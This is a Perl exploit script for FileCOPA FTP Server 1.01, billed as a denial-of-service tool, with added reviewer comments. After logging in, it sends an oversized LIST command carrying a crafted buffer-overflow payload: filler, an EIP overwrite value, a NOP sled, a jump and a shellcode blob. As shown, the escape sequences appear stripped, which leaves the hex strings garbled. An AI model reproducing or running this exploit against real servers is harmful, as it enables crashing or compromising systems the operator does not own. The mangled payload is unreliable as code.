Authored by Fernando Mengalli

FileCOPA FTP Server version 1.01 denial of service exploit.

#!/usr/bin/perl
#
# e-mail: fernando.mengalli@gmail.com
#
# Date: 04/06/2021
#
# Version Vulnerable: FileCOPA FTP Server 1.01
#
# OS Tested: Windows XP Service Pack 3 (Brazilian) and Windows 2000
#
# Youtube video: https://youtu.be/A9cEoyY9Bd4
#
# badchars x00 x0a


use Net::FTP;
use Term::ANSIColor;


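# Clear the terminal before anything else is printed.
# Perl reports native Windows as "MSWin32" in $^O (never "windows"), so the
# original comparison always fell through to the Unix "clear" command.
my $sis = $^O;
print $sis;    # kept from the original: echoes the OS name just before the clear

my $cmd = $sis eq 'MSWin32' ? 'cls' : 'clear';

# The command name is one of two fixed literals; nothing from @ARGV reaches it.
system($cmd);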

# Show the usage banner unless both the host and the port were supplied.
# This only prints: execution continues past this point, and the exit for
# missing arguments is a separate check further down the script.
apresentacao() unless $ARGV[0] && $ARGV[1];

# Print the usage banner to STDOUT: tool title, author, and the expected
# "<IP> <Porta>" command-line arguments. Takes no arguments.
sub apresentacao {
    print <<'BANNER';

######################################################
# #
# [*] FileCOPA FTP Server 1.01 - Denied of Service #
# #
# [*] Author: Fernando Mengali #
# #
# [+] Modo de uso: perl exploit.pl <IP> <Porta> #
# #
################# Code Exploit #######################



BANNER
}


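# Target host and port, taken positionally from the command line.
our $alvo  = $ARGV[0];
our $porta = $ARGV[1];

# Stop unless both arguments were given. The original tested "&&", so a run
# with only one argument printed the usage banner and then carried on with an
# undefined port; "||" matches the condition used for the usage banner.
if (!$ARGV[0] || !$ARGV[1]) {
    exit;
}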


# Reject the target unless it matches the address pattern below, then exit.
# NOTE(review): the pattern and the message are reproduced exactly as they
# appear in this listing. Escape sequences look to have been lost in
# extraction, so as rendered the pattern does not test for digits -- confirm
# against the original file.
unless ($alvo =~ /(d{1,3}.d{1,3}.d{1,3}.d{1,3})/) {
    print color('red bold'), " nn [-] Por favor, defina o IP alvo! nn";
    color('reset');    # return value is discarded, so no reset sequence is written
    exit;
}

# Reject a port below 0 or above 65535, then exit.
# The message asks for a port from 1 to 65535, but the comparison itself lets
# 0 through; the value is compared numerically without checking that it is a
# number first.
if ($porta > 65535 || $porta < 0) {
    print color('red bold'), " nn [-] Por favor, defina uma porta de 1 a 65535! nn";
    color('reset');    # return value is discarded, so no reset sequence is written
    exit;
}

# Echo the chosen target and port back to the operator in green.
print color('green bold'),
    "nnAlvo definido =>", $alvo, " n n",
    "Porta definida =>", $porta, "nn";
color('reset');    # return value is discarded, so the colour stays active

# Prompt for the FTP account name; the trailing newline is stripped.
print color('yellow bold'), "[+] Por favor, informe a nome de usuário: ";
color('reset');
print color('red bold');
chomp(my $usuario = <stdin>);
color('reset');

# Prompt for the FTP password. It is read with a plain line read, so it is
# echoed to the terminal as typed.
print color('yellow bold'), "[*] Por favor, informe a senha de acesso: ";
color('reset');
print color('red bold');
chomp(my $senha = <stdin>);
color('reset');

# Opaque blob that the script appends to the end of the oversized argument
# it sends to the server.
# NOTE(review): reproduced exactly as it appears in this listing. Escape
# sequences look to have been lost in extraction, so as rendered this is a
# plain text string rather than binary data. What it does cannot be
# determined from the listing; treat it as untrusted content.
my $buf =
"xbax17x61x66xafxdbxd9xd9x74x24xf4x5dx2bxc9" .
"xb1x60x31x55x12x83xedxfcx03x42x6fx84x5axb7" .
"xa9xf0x15x7bxd9xfbx8fxf7x01x08x75xdcx80x41" .
"xd3x13x51xbaxe7x11x4dx39x25x21xb3x27x8bx30" .
"xefxf1xacxbdx95xe9xcfx1ax1dxb9xe1xf6x27x0b" .
"xffx02x98xc0xf6xc7x19x52xc4x94x18xdbx56x20" .
"xb6x9axc4xb5xecxf3x40xd4x19x17x6dx35x50x3a" .
"x13xc3xb3xf0x38x8dxffxc5x05x55x33xe7xd2x9e" .
"xb6x8cx9bx79xcex8fxd6x30x72x12x62x26x3exed" .
"xefxdax23x88x07x74xdcxbexe1xc4x3ex91x8ax26" .
"x3ax3fx2bxf2xe5x3ax18x0fxd0x8dx7bxbaxf3xba" .
"x2bx5bxa5x2dx54xaax88x68x4bxf4xccx24x68xc1" .
"x19x22xf9x08xd6x08x8fx4axe0x7dx67xc1x4exd8" .
"x08x34x44x2bx6ax6fx41x6dx53x26x73x9dxb4xca" .
"x87xedxe6x2dx8bx1cx42x0exb3x20xd0xa1x48x97" .
"x45x46x26x6bxe7x74x52xc1xaex2dx8dx1ax06xe0" .
"x24x26xbexfex26xf8x48x75x73x5dx6cx67xebxf4" .
"xf4x08x91xf8x5fx4ax3axd4x5cxd4x7cx52x13xa5" .
"x08x06xc9x8bx04x9ax0fxe5xe8x1fxefx28x3bxe9" .
"x6exf9xeex7exf0x5cx5ex4fx95x49x0fx83xf0x70" .
"x09xf6x83xe9x43xb8xe0x88x51x6ex9cx5dx48x5b" .
"x9bxcax9axf1x48xa8x51x22x61x12x55xfex10x16" .
"xb5x42x42xffx15x14x3fx44x9bx92xfcxd9x67xe0" .
"x15xd1x64xcex75xecxa3x08x03x61x4ax3bx0ex5a" .
"xb0x7bxe6x2cxacxaex5dxadx71xf5xb8xc4x4fxd3" .
"xf4x40x2bx92x75x83xe3x0fx4cx23x78x72x0fx22" .
"xb9x10xa6x1dxc9xcbxcaxe5x61xf8x5fx64x86x49" .
"x5bxb2x9ex75x30xc6x6ex3cx9ax02xadx03x36x29" .
"xafx84x62x98x22xcdxbfx7exa2x14x97x75xa2xc3" .
"xab";

# Assemble the oversized argument: 320 repeats of one filler value, the value
# the author labels EIP, 3105 repeats of a second filler value, the value
# labelled JMP, the $buf blob, and a trailing terminator string.
# NOTE(review): the literals are shown exactly as they appear in this
# listing, where escape sequences look to have been lost in extraction.
# For defenders: the two filler runs alone put this argument at several
# thousand bytes, far beyond any legitimate directory-listing argument, so
# FTP command-line length is a usable detection signal. The author's own
# comment places the EIP value inside ADVAPI32.dll, so it is presumably tied
# to the specific OS builds named in the file header -- confirm.
$offset = "x41"x320;
$NOPS= "x90"x3105;
$JMP = "xe9xbfx2cxb0xff"; # jmp to a memory address
$EIP= "x93x79x2ex7c"; # here, the jmp located in the ADVAPI32.dll library


$payload = $offset . $EIP . $NOPS . $JMP . $buf . "rn";

# Connect, authenticate, send one oversized LIST request, then report.
# As written, the request is sent only after a successful login, so the
# behaviour exercised here is post-authentication. For defenders: the
# observable artefact is a single LIST command with a multi-kilobyte argument
# right after login; moving off the 1.01 release named in the file header and
# limiting which accounts can log in both reduce exposure.
print color('cyan');
print "nn[+] Conectando para o servidor " . $alvo . ":" . $porta."... n";
# Open the control connection; abort if the constructor returns false
# (message: "could not connect").
$ftp = Net::FTP->new($alvo, Debug => 0, Port => $porta) || die
color('red')."n[-] Não foi possível conectar. n";
sleep(2);
print "[+] Conectado!n";
sleep(2);
# Log in with the credentials typed at the prompts; abort on failure.
# NOTE(review): $! holds the last OS error and may not describe an FTP-level
# login failure.
$ftp->login($usuario,$senha) || die color('red')."n [-] Não pode conectar
ou você derrubou: $!";
# The "authenticating" message is printed after login() has already returned.
print "[+] Autenticando...n";
sleep(2);
print "[+] Autenticado com sucesso!nn";
sleep(2);
print "[*] Sobrecarregando o servidor...nn";
sleep(2);
# Send "LIST A" followed by the oversized string as one FTP command (the
# arguments are joined with a space). The server's reply is never read.
$ftp->command("LIST A", $payload);
color('reset');
print color('green bold');
# "Server is down!" is printed unconditionally; nothing above checks the
# server's state, so this line is not evidence of any effect on the target.
print "[+] Servidor fora do ar!n";
color('reset');
exit(0);